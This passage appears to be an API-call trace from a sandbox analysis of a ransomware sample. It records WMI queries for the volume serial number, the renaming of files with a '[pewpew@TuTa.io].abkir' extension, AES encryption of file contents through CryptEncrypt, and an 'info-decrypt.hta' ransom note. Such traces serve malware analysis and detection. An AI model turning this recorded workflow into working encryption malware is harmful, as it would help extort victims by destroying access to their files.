WbemLocator:IUnknown:AddRef (This=0x603368c) returned 0x4 [0211.263] WbemLocator:IUnknown:Release (This=0x603368c) returned 0x3 [0211.263] WbemLocator:IUnknown:Release (This=0x603368c) returned 0x2 [0211.263] SysStringLen (param_1=0x0) returned 0x0 [0211.263] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030c50, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0211.263] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0211.263] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0211.263] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0211.263] WbemLocator:IUnknown:AddRef (This=0xb5b9c4) returned 0x3 [0211.263] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5b9c4) returned 0x0 [0211.263] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x3 [0211.263] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x2 [0211.263] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0211.263] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0211.263] IWbemServices:GetObject (in: This=0x603368c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6027e50, ppCallResult=0x0) returned 0x0 [0211.324] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030be0, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0211.324] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0211.325] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0211.325] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35f2ba8*=0, plFlavor=0x35f2bac*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x35f2ba8*=8, plFlavor=0x35f2bac*=0) returned 0x0 [0211.325] SysStringByteLen (bstr="9C354B42") returned 0x10 [0211.325] SysStringByteLen (bstr="9C354B42") returned 0x10 [0211.325] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35f2ba8*=8, plFlavor=0x35f2bac*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x35f2ba8*=8, plFlavor=0x35f2bac*=0) returned 0x0 [0211.325] SysStringByteLen (bstr="9C354B42") returned 0x10 [0211.326] SysStringByteLen (bstr="9C354B42") returned 0x10 [0211.326] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm", lpFilePart=0x0) returned 0x34 [0211.326] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x57 [0211.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0211.326] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\vigtigt.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x375f6ca0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0211.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0211.326] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\vigtigt.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\vigtigt.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0211.338] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm", lpFilePart=0x0) returned 0x33 [0211.338] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0211.338] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0211.338] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0211.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0211.338] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm", lpFilePart=0x0) returned 0x33 [0211.338] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0211.339] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktig.htm"), fInfoLevelId=0x0, lpFileInformation=0x35f30c8 | out: lpFileInformation=0x35f30c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41b2)) returned 1 [0211.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0211.339] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm", lpFilePart=0x0) returned 0x33 [0211.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0211.339] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktig.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0211.339] GetFileType (hFile=0x320) returned 0x1 [0211.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0211.339] GetFileType (hFile=0x320) returned 0x1 [0211.339] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x41b2 [0211.339] ReadFile (in: hFile=0x320, lpBuffer=0x3626a1c, nNumberOfBytesToRead=0x41b2, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x3626a1c*, lpNumberOfBytesRead=0x8f6eedc*=0x41b2, lpOverlapped=0x0) returned 1 [0211.476] CloseHandle (hObject=0x320) returned 1 [0211.476] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xbe11b8) returned 1 [0211.477] CryptGenRandom (in: hProv=0xbe11b8, dwLen=0x10, pbBuffer=0x36f3f0c | out: pbBuffer=0x36f3f0c) returned 1 [0211.825] CryptImportKey (in: hProv=0xbe11b8, pbData=0x36b3af4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f890) returned 1 [0211.825] CryptContextAddRef (hProv=0xbe11b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.825] CryptContextAddRef (hProv=0xbe11b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.825] CryptDuplicateKey (in: hKey=0xb7f890, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f110) returned 1 [0211.825] CryptContextAddRef (hProv=0xbe11b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.825] CryptSetKeyParam (hKey=0xb7f110, dwParam=0x4, pbData=0x36b3bd4*=0x1, dwFlags=0x0) returned 1 [0211.825] CryptSetKeyParam (hKey=0xb7f110, dwParam=0x1, pbData=0x36b3ba0, dwFlags=0x0) returned 1 [0211.825] CryptEncrypt (in: hKey=0xb7f110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36b3be4*, pdwDataLen=0x8f6eea8*=0x41c0, dwBufLen=0x41c0 | out: pbData=0x36b3be4*, pdwDataLen=0x8f6eea8*=0x41c0) returned 1 [0211.826] CryptEncrypt (in: hKey=0xb7f110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36b7dc8*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x36b7dc8*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0211.827] CryptDestroyKey (hKey=0xb7f890) returned 1 [0211.827] CryptReleaseContext (hProv=0xbe11b8, dwFlags=0x0) returned 1 [0211.827] CryptReleaseContext (hProv=0xbe11b8, dwFlags=0x0) returned 1 [0211.827] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm", lpFilePart=0x0) returned 0x33 [0211.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0211.827] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktig.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0211.828] GetFileType (hFile=0x31c) returned 0x1 [0211.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0211.828] GetFileType (hFile=0x31c) returned 0x1 [0211.828] WriteFile (in: hFile=0x31c, lpBuffer=0x36b83c4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x36b83c4*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0211.829] CloseHandle (hObject=0x31c) returned 1 [0211.830] CoTaskMemAlloc (cb=0x20c) returned 0x66cdfc8 [0211.830] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66cdfc8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0211.830] CoTaskMemFree (pv=0x66cdfc8) [0211.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0211.830] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0211.830] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0211.830] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0211.830] IUnknown:Release (This=0xb51e34) returned 0x1 [0211.831] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6027290) returned 0x0 [0211.831] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027290, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0211.831] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027290, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6029ce0) returned 0x0 [0211.831] WbemDefPath:IUnknown:Release (This=0x6027290) returned 0x0 [0211.831] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6029ce0) returned 0x0 [0211.832] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0211.832] WbemDefPath:IUnknown:AddRef (This=0x6029ce0) returned 0x3 [0211.832] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0211.832] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0211.832] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0x66ce488) returned 0x0 [0211.832] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce488, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0211.832] WbemDefPath:IUnknown:Release (This=0x66ce488) returned 0x3 [0211.832] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0211.832] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0211.832] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0211.832] WbemDefPath:IUnknown:Release (This=0x6029ce0) returned 0x2 [0211.832] WbemDefPath:IUnknown:Release (This=0x6029ce0) returned 0x1 [0211.832] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0211.832] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0211.832] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ce0, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6029ce0) returned 0x0 [0211.832] WbemDefPath:IUnknown:AddRef (This=0x6029ce0) returned 0x3 [0211.832] WbemDefPath:IUnknown:Release (This=0x6029ce0) returned 0x2 [0211.832] WbemDefPath:IWbemPath:SetText (This=0x6029ce0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0211.832] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ce0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0211.832] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0211.832] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0211.832] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029ce0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0211.832] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ce0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0211.832] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029ce0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0211.832] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029ce0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0211.832] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ce0, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0211.832] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0211.832] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0211.833] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0211.833] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0211.833] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0211.833] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0211.833] IUnknown:Release (This=0xb51e34) returned 0x1 [0211.833] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6027200) returned 0x0 [0211.833] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027200, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0211.833] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027200, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6029ff0) returned 0x0 [0211.834] WbemDefPath:IUnknown:Release (This=0x6027200) returned 0x0 [0211.834] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6029ff0) returned 0x0 [0211.834] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0211.834] WbemDefPath:IUnknown:AddRef (This=0x6029ff0) returned 0x3 [0211.834] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0211.834] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0211.834] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0x66ce2b8) returned 0x0 [0211.834] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce2b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0211.834] WbemDefPath:IUnknown:Release (This=0x66ce2b8) returned 0x3 [0211.834] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0211.945] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0211.945] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ff0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 